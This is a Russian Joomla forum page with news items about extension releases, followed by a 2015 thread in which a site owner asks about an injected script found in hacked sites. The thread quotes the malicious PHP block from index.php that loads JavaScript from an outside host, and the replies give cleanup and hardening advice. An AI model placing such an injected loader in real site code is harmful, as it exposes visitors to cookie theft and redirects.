Новости Joomla

Phoca Email - простой компонент email-рассылок

WT Yandex map items v.2.1.0 модуль для Joomla.Выводит материалы Joomla в виде меток на Яндекс.Карты

WT Yandex map items v.2.1.0 модуль для Joomla.Выводит материалы Joomla в виде меток на Яндекс.Карты

👩‍💻 WT Yandex map items v.2.1.0 модуль для Joomla.Выводит материалы Joomla в виде меток на Яндекс.Карты.v.2.1.0. Что нового?Сохранение последнего вида карты. Добавлены новые опции, позволяющие как для одного экземпляра модуля, так и для всех сохранять на устройстве пользователя последний использованный центр (координаты) и масштаб (zoom) карты. Это позволит открыть карту в том же месте после обновления страницы или при повторном открытии браузера.Определение местоположения пользователя.Модуль может определять местоположение пользователя и центрировать карту на нём. При одновременном использовании с функцией сохранения последнего вида карты определение геопозиции будет срабатывать только в первый раз. В дальнейшем, если обнаружены сохранённые данные центра и масштаба - будут использоваться они.CSS классы для маркеров карты.Всем маркерам карты добавлен CSS-класс wt-yandex-map-items-marker. Для просмотренных маркеров (по которым кликали) добавляется CSS-класс wt-yandex-map-items-marker-viewed, что позволит выделять просмотренные маркеры с помощью стилей в CSS-файлах вашего шаблона. Также для контейнеров маркеров ymaps на карте добавлены data-атрибуты: data-module-id - id модуля и data-marker-id - id маркера.Обработка GET-параметров в URL.Карта может реагировать на GET-параметры в url:- map[zoom] - устанавливает параметр масштаба.- map[center_latitude] и map[center_longitude] - широта и долгота центра карты.- map[marker_id] - id маркера, на котором центрируется карта.Таким образом вы можете создавать ссылку на карту с указанием конкретного маркера, на котором карта сфокусируется после загрузки маркеров. Например, https://site .ru/map?map[marker_id]=18465. Или же ссылку с указанием конкретных координат: https://site .ru/map?map[zoom]=16&map[center_latitude]=51.529706&map[center_longitude]=46.033922Страница расширенияGitHub расширенияВидео-обзор на YoutubeВидео-обзор на VK ВидеоВидео-обзор на Rutube@joomlafeed#joomla #yandex

Вышел Quantum Manager ver.3.2.1 и ver.2.0.5 — Релиз безопасности

Вышел Quantum Manager ver.3.2.1 и ver.2.0.5 — Релиз безопасности

Вышел Quantum Manager ver.3.2.1 и ver.2.0.5 — Релиз безопасности.В последних версиях Quantum Manager устранены две уязвимости безопасности и исправлено несколько ошибок. Всем пользователям настоятельно рекомендуется обновиться до версии 3.2.1, чтобы обеспечить безопасность и актуальность установки.👩‍💻 Исправлены:1. XSS в SVG-файле. Запрещено выполнение встроенных в SVG скриптов.2. XSS по имени вредоносного файла. Больше никакого выполнения кода через имя файла.Поскольку эти проблемы влияют на безопасность сайта, мы подготовили две версии: одну для Joomla 5 и Joomla 4, а также дополнительную версию для Joomla 3 (предназначенную для устаревшего релиза Quantum Manager 2.0.4, для тех, кто все еще поддерживает сайты на Joomla 3).⚠️ Примечание: обновите Quantum Manager до версии 3.2.1 для Joomla 5 / Joomla 4 и установите Quantum Manager версии 2.0.5 для Joomla 3 (только исправления проблем безопасности).Команда NorrNext благодарит Joomla Security Strike Team и Joomla VEL Team за помощь в обнаружении и исправлении уязвимостей.Читать новостьСкачать@joomlafeed#joomla #расширения

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 7 Ответов
  • 1874 Просмотров
*

ap11

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
  • Разработка сайтов на Joomla!
Взломана Joomla, непонятный скрипт
« : 21.06.2015, 00:01:22 »
Есть несколько сайтов на одном хостинге: один из них на Joomla 1.5, другие на Joomla 2.5.4
Произошел взлом какого-то сайта, наверное 1.5, в результате заражены были все сайты.
В файле index.php всех сайтов стоит блок:

Код
<?php
#033761#
if(empty($j)) {
$j = "<script type=\"text/javascript\" src=\"http://ghseif.us/manage/login/6fh1tz6y.php?id=12745\"></script>";
echo $j;
}
#/033761#
?>


если смотреть код сайта в HTML то там просто стоит скрипт в коде:

Код
<script type="text/javascript" src="http://ghseif.us/manage/login/6fh1tz6y.php?id=12745"></script>

Вопрос: в чем смысл этой ссылки в скрипте? она ведь не индексируется поисковиком... или может быть редирект при каких-то условиях..?

И решится проблема, если просто обновить сайты и убрать этот код из index.php?

И еще не совсем понятно ситуация: в корне сайта есть папки с датой изменения как и файла index.php, но в папках нет файлов этой даты, все файлы старые.. это тоже могло быть изменено при взломе?
« Последнее редактирование: 21.06.2015, 00:08:17 от ap11 »
Записан
*

zomby6888

  • Завсегдатай
  • 1473
  • 171 / 3
Re: Взломана Joomla, непонятный скрипт
« Ответ #1 : 21.06.2015, 00:19:23 »
Цитировать
Вопрос: в чем смысл этой ссылки в скрипте?

В том что произвольный код исполняется на страницах сайта. Он может что угодно делать, воровать пользовательские кукисы и данные,  или перенаправлять пользователей например.
Записан
интернет-блог: http://websiteprog.ru
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: Взломана Joomla, непонятный скрипт
« Ответ #2 : 21.06.2015, 00:22:13 »
Проблема решается откатом сайтов из резервной копии и дальнейшим обновлением или поиском уязвимостей.
Записан
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Взломана Joomla, непонятный скрипт
« Ответ #3 : 21.06.2015, 05:24:37 »
Если Joomla до 1.5.26, и до 2.5.28, то все содержат уязвимость.
Сканер айболит в помощь
Записан
*

wishlight

  • Гуру
  • 5059
  • 315 / 1
  • От 300 руб быстрый хостинг. Сервера.
Re: Взломана Joomla, непонятный скрипт
« Ответ #4 : 21.06.2015, 06:53:26 »
Кроме этого каждый сайт надо отделить от другого.
Записан
*

ap11

  • Осваиваюсь на форуме
  • 22
  • 0 / 0
  • Разработка сайтов на Joomla!
Re: Взломана Joomla, непонятный скрипт
« Ответ #5 : 21.06.2015, 16:08:12 »
спасибо всем за ответы
я так понимаю взлом может быть из-за расширений также
на Joomla 2.5.4 стоят:

компоненты:
Ackeeba Backup
Fox Contact (для Joomla 1.7)
Rockcandy
RokGallery
EasyBook

плагин:
AllVideos

шаблон от Рокетов с Gantry фреймворком. также привлекло внимание, что не во всех php файлах шаблона стоит defined('_JEXEC') or die('Restricted access');  т.е. запрет прямого доступа к файлам

Что из этого опасно?
Мне кажется Fox Contact, т.к. Joomla 1.7, и возможно Ackeeba Backup, т.к. можно выкачать сайт... ну и прямого доступа также не должно быть..
Записан
*

ChaosHead

  • Гуру
  • 5242
  • 451 / 13
Re: Взломана Joomla, непонятный скрипт
« Ответ #6 : 21.06.2015, 19:57:10 »
Взлом ещё может быть от того, что вирус в вашем компьютере украл пароль от ftp
Записан
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Взломана Joomla, непонятный скрипт
« Ответ #7 : 22.06.2015, 07:26:40 »
Цитата: ap11 от 21.06.2015, 16:08:12
спасибо всем за ответы
я так понимаю взлом может быть из-за расширений также
на Joomla 2.5.4 стоят:

компоненты:
Ackeeba Backup
Fox Contact (для Joomla 1.7)
Rockcandy
RokGallery
EasyBook

плагин:
AllVideos

шаблон от Рокетов с Gantry фреймворком. также привлекло внимание, что не во всех php файлах шаблона стоит defined('_JEXEC') or die('Restricted access');  т.е. запрет прямого доступа к файлам

Что из этого опасно?
Мне кажется Fox Contact, т.к. Joomla 1.7, и возможно Ackeeba Backup, т.к. можно выкачать сайт... ну и прямого доступа также не должно быть..
Конкретно встречался с уязвимостями на Ackeeba Backup, Fox Contact, RokGallery, здается мне если в сторону других капнуть, там тоже всплывет что нить...
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Как выявить вредоностный код на CMS Joomla?

Автор stud_pro

 Ответов: 1
Просмотров: 2145 		Последний ответ 23.04.2024, 10:06:10
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

 Ответов: 110
Просмотров: 69007 		Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 2922 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Скрипты защиты Joomla 4

Автор mister_boy

 Ответов: 6
Просмотров: 2849 		Последний ответ 16.05.2023, 16:38:58
от mister_boy
Поставил Joomla 4. Хостинг nic.ru стал ругаться на ошибки безопасности

Автор Oleg+

 Ответов: 5
Просмотров: 2242 		Последний ответ 13.09.2021, 09:23:28
от Oleg+